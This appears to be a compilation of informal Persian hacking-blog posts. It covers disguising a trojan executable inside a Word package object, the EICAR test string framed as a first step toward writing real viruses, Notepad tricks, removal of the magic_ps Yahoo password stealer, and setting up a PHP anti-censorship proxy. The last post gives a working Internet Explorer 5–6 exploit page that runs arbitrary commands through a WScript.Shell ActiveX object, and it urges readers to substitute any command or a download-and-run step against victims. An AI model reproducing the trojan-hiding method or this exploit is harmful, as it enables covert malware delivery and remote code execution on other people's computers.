۴. حال همون فایل رو که توی ورد گذاشتید انتخاب کنید .یعنی روش تک کلیک کنید( بعد به Edit برید و بعد به Package Object و روی برگه edit package کلیک کنید حالا در پنجره باز شده به edit برید و copy package رو بزنید .. در اخر هم به یکی از فولدر ها یا درایوها بریدو راست کلیک کنید و paste رو بزنید .... به همین اسونی فایل تروجان.EXE یا هر کوفت دیگرو میتونید بی نام و نشون کنید .. علاوه بر اینکه ایکون فایل شبیه این بچه مثبتا میشه به همین راحتیم پسوندشو لو نمیده اصلا پسوندی در کار نسیت... فقط اینو بگم که اخرین نسخه ویندوز xp قبل از اجرای این نوع فایلها یه دیالوگ دانلود باز میکنه ..احتمالا..موفق باشيد
(نظر يادتون نره

نها با استفاده از Notepad آنتي ويروس خود را به مبارزه بطلبيد!!!!!!! ويك ويروس مخرب بسازيد ! ... بله امروز قرار است آنتي ويروس خود را از خواب بپرانيد. اسم اين ويروسي كه شما امروز ميسازيد Eicar است اين ويروس در حقيقت يك ويروس نماي استاندارد براي تست آنتي ويروسهاست. يادتان باشد قبل از شروع به كار آنتي ويروس خود را فعال كنيد .اگر آنتي ويروس شما اين ويروس را تشخيص داد كه هيچ ولي اگر تشخيص نداد يا بايد آنتي ويروس خود را آپديت كنيد يا آن را تعويض نماييد. در ضمن براي تكميل توضيحات فوق بايد خدمتتان عرض كنم كه EICAR مخفف عبارت European Institute for Computer Antivirus Research است. حالا ميرسيم به شروع كار: مثل هميشه ابتدا Notepad را باز كنيد و عبارت زير را در آن وارد كنيد لطفا از Copy و Paste استفاده كنيد:
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* سپس SaveAs را انتخاب و فايل را با پسوند com سيو كنيد يعني با نامي مثل eicar.com خب كار شما به پايان رسيد. اميدوارم موفق شده باشيد آنتي ويروس خود را از خواب بپرانيد!!! قبل از اينكه خودتان اين كار را انجام دهيد لطفا تذكرهاي زير را در نظر بگيريد:
تذكر1) اين ويروس يك ويروس واقعي نيست و در حقيقت يك ويروس نما است و فقط براي تست آنتي ويروس شما مثل يك ويروس عمل ميكند.بنابراين اگر آنتي ويروس شما موفق به تشخيص آن نشد و شما در اين دوئل پيروز شديد!! ميتوانيد مطمئن باشيد كه eicar به هيچ وجه به سيستم شما آسيبي نخواهد رساند.
تذكر2) با اينكه eicar يك ويروس واقعي نيست ولي مطلب امروز در حقيقت مقدمه اي بود براي ساخت ويروسهاي واقعي كه در چند روز آينده به شما ياد خواهم داد (هكر ها معمولا از ويروس eicar براي گمراه كردن كاربر و پرت كردن حواس او از ويروس اصلي استفاده ميكنند). ما در آينده حتي از آيكون چندكاره هم براي قوي كردن ويروس هايمان استفاده خواهيم كرد.
اميدوارم از Trick امروز هم خوشتان آمده باشد...پيروز باشيد

امروز نكات ريز و جالبي از نت پد را به شما نشان خواهم داد . بالاخره قبل از شروع كارهاي مهمی است که شما بايد از اين چند نكته ريز خبر داشته باشيد.
نكته اول/ساختن دكمه Run: شما در بعضي كامپيترها ممكن است به دلايل امنيتي يا غير امنيتي دسترسي به دكمه Run نداشته باشيد اين كار به وسيله بعضي از نرم افزارهاي امنيتي قابل انجام است. در اين حالت شما ميتوانيد با نت پد اين كليد كارآمد را خودتان بسازيد:
براي اين كار Notepad را باز كنيد و متن زير را در آن Paste كنيد.
(new ActiveXObject("Shell.Application")).FileRun() سپس فايل خود را با پسوند JS يعنی با نامي مثل MyRun.jsسيو كنيد. البته همانطور كه ميدانيد js مخفف Java Script است.

نكته دوم/ساختن كليد Show Desktop با آيكونهاي متفاوت: براي اين كار دوباره وارد Notepad شويد و متن زير را در آن Paste كنيد:
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
سپس فايل خود را با پسوند scf يعني با نامي مثل MyDesktop.scf بر روي دسكتاپ خود سيو كنيد. در اين حالت اين دكمه با آيكون استاندارد خود ساخته ميشود. اگرشما بخواهيد آيكون ديگري را براي دكمه خود انتخاب كنيد بايد در خط سوم دستور بالا بجاي عدد 3 عدد ديگري در محدوده 0 تا 17 انتخاب كنيد كه من در زير براي شما اين آيكونها را شرح ميدهم تا راحتتر آيكون دلخواه خود را انتخاب كنيد. در ضمن علامت # كه در جلوي بعضي از آنها مشاهده ميكنيد به اين معني است كه آن آيكون جزو آيكونهاي مخفي ويندوز است و شما جز در اين حالت نميتوانيد اين آيكون را براي فايل ديگري انتخاب كرد:
0= آيكون جديدMyComputer
1= آيكون استاندارد Explorer
2= آيكون سابقFax #
3= آيكون استاندارد ShowDesktop
4= آيكون سابق Fax با يك علامت سوال #
5= آيكون جديد Start
6= آيكون جديد Recyclebin
7= علامت ! درون يك دايره
8= علامت ! درون يك مثلث #
9= علامت ضربدر#
10= آيكون سابقMyComputer #
11= علامتي شبيه >>#
12= علامتي شبيه <<#
13= آيكون استاندارد New File
14= آيكون زمين
15= آيكون پاكت نامه #
16= آيكون پاكت نامه با Microsoft Word #
17= آيكون سابق Start #

نكته آخر/ : نكته آخر امروز هم اين است كه شماهر گاه در نت پد مشغول نوشتن چيزي باشيد و بخواهيد تاريخ و ساعت را در پايان يا هرجاي ديگر مطلب خود بنويسيد ميتوانيد در همانجا كليد F5 را زده و اين كار بصورت خودكار انجام ميشود. اميدوارم از نكات امروز خوشتان آمده باشد. در قسمت بعدي از اين سري مقالات شما اولين ويروس واقعي خود را خواهيد نوشت.
موفق باشيد

يکی از راهايی که من ميدونم را بهتون ميگم فکر نميکنم راه ديگه ای وجود داشته باشه

چون ويروس magic_ps تو start up می شينه نمی توان از روی سيستم پاکش کرد بايد به وسيله سيستم ميکانيک که برنامه فوق العاده جالبيه... استفاده کرد که start up شما را نشان بده اگه خواستيد از اينجا دانلودش کنيد اين برنامه پولی نيستش ایميل يه سری چيزها ازتون ميخواد بعد که بديد قابل دانلود هست اگه باز هم نتونستيد بگيريد ورژن قبلی شو بگيريد

وقتی دانلودش کرديد به قسمت win dows start up رفته ليستی براتون مياد که برنامه های شما تو start up نشسته شما بايد به دنبال اين اسم svehost با فرمت exe باشيد

اگه بود روش کليک و دکمه delete را بزنيد و دستگاه ريسط ميشود وقتی سيستم بالا اومد مرحله نهايی بايد به اتمام برسونيد و بايد اين دفعه باز اين کلمه svehost سرچ کنيد معمولا تو اونجايی که windows نصب هست ميشينه وقتی پيداش کرديد پاکش کنيد........ بعضی دوستان فکر ميکنند با انتی ويروس پاک ميشه با هر ای دی باز هم لوگين بشيد پسوردش ميره راه ديگش اينه که ويندوز عوض کنيد

از کجا بفهميم که با magic_ps هک شديم

وقتی پسورد خود را به ياهومسنجر ميديم يه حالتی پيش مياد يا وسط پسوردتون فاصله می افته يا وقتی با ياهو مسنجر کانکت بشی يه pm به يه چشم به هم زدن برای طرف پسورد می فرسته يا تو ارشيو مسنجرتون متوجه می شيد

بايد چی کار کنيم پسورد برای طرف رفته باشه و ای دی ما و هک نکنه

تا متوجه اين موضوع شديد سريعا از ياهو خارج بشيد و پسوردتون را عوض کنيد و ديگر کا نکت نشيد با ياهو مسنجر سيستم الوده تا موقعی که ويروس پاک نکرديد و يا اگر پسورد شما را اون زودتر عوض کرده راهی نداريد جز اينکه سوال جواب های که يا هو موقع ساختن ای دی ازتون ساخته بديد تا پسورد جديد به شما بده که معولا ما اين پرسش پاسخ از يادمون ميره اگه يادداشت کنيم يا يادتون باشه هيچ وقت آديتون خراب يا هک نمی شه

با تشکر از آقا بهلولی

لازم نيست توضيح بدم كه فيلترشكن هاي اين روزها چقدر به درد مي خورن. مشكل فيلتر شكن هاي عمومي و آدرس هاي PROXY اينه كه بعد مدتي كه مدتي معروف شدن در ليست سانسور قرار مي گيرن و خودشون هم فيلتر مي شن. بنابراين اگر شما براي خودتون يك فيلتر شكن شخصي داشته باشين كه فقط خودتوت ازش استفاده كنيد مطمئنا اصلا كسي متوجه اون نمي شه كه بخواهد مورد سانسور قرار بگيره.
يك اسكريپت فيلتر شكن كه به صورت OpenSource در اختيار همه است در اين سايت قرار داره. فايل ZIP رو دانلود كنيد و روي كامپيوتر خورتون باز كنيد.
مسئله بعدي پيدا كردن يك ميزبان رايگان است كه بايد از php هم پشتيابي كند. خودم شخصا CompactVision رو ترجيح ميدم. ديگه بقيه كار خيلي ساده است اول كل فايل هاي اسكريپت رو به آدرسي كه از طرف سايت بهتون م يرسه Upload (FTP) كنيد. و يادتون نره كه Permission فايل Index.php حتما 755 باشه. براي نمونه من يكي تو آدرس Filter.compactvision.net قرار دادم.
البته اين اسكريپت خيلي قدرتمند و كامل نيست ولي براي خوندن متن سايت هاي فيلتر شده در اغلب موارد كفايت مي كنه .البته اگر به دنبال سايت هاي پورنو و ... ياشيد اين راه حل چندان كار ساز نيست. اگر سايتي كه اسكريپ بهتري داره و يا اينكه سايتي رو مي شناسيد كه فضاي مجاني به همراه پشتيباني از php ارائه مي كنيد حتما اينجا تو نظر خواهي بنويسيد. متشكرم

سلام دوستان
ميخوام روش هك با استفاده از آسيب پذيري اينترنت اكسپلورر رو بهتون ياد بدم
البته ذكر اين نكته رو هم مهم ميدونم كه اين روش روي سيستمهايي كه روشون اينترنت اكسپلورر ورژنهاي 5 تا 6 هست كارايي داره و روي بقيه سيستمها تيرتون به سنگ ميخوره.
عرضم به خدمتتون كه براي استفاده ازاين روش به صورت كلاسيك نيازمند هستين به 2 تا فايل از نوع HTML ساده (يادتون باشه فقط اين فرمت كارايي داره و نه هيچكدوم از بقيه فرمتهاي وب).خلاصه گفتم كه نيازمند 2 تا فايل از نوع اچ تي ام ال ساده هستيم كه توي اين مثالي كه براتون ميارم يكي رو Exploit.htm و اون يكي رو Request.htm نامگذاري كرديم . شخصي كه بايد هك بشه فقط كافي هست كه فايل Request.htm رو دريافت كنه و اون موقع هست كه ميتونين هر كاري كه دلتون خواست انجام بدين.
و اما محتواي اين فايلها چي هست ؟
ابتدا محتواي فايل اكسپلويت رو تشريح ميكنم. اين فايل بايد حاوي تگهاي زير باشه كه در اصل يك آبجكت ايجاد ميكنه كه هرچي سر قرباني مياد اين آبجكت مياره. بعد هم با استفاده از متد اجراي اين آبجكت ميتونين هر چي رو كه خواستين روي كامپيوتر طرف اجراكنين و بـــــــــــــوم .......
حالا ببينين محتواي اين فايل Explot.htm چي ميتونه باشه :





<HTML>
<BODY>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmD.exe /k label c: XeoN_H4ck3d");
</script>
</BODY>
</HTML>













اين محتواي يك فايل اكسپلويت نمونه هستش كه ليبل درايو سي رو عوض ميكنه. ميتونين به جاي اين دستور هر چيز ديگه اي قرار بدين ( خدا منو ببخشه) تا اجرابشه.
حتي ميتونين فايل داونلود و اجراكنين كه البته اين كار رو يه كم پيچيده تر ميكنه ميتونين به سهل الاستفاده ترين روش هر بلايي كه دلتون خواست سر هركسي كه بود بيارين (حتي رئيس جمهور) بدون اينكه طرف بفهمه كه از كجا خورده.

منبعش يادم نيس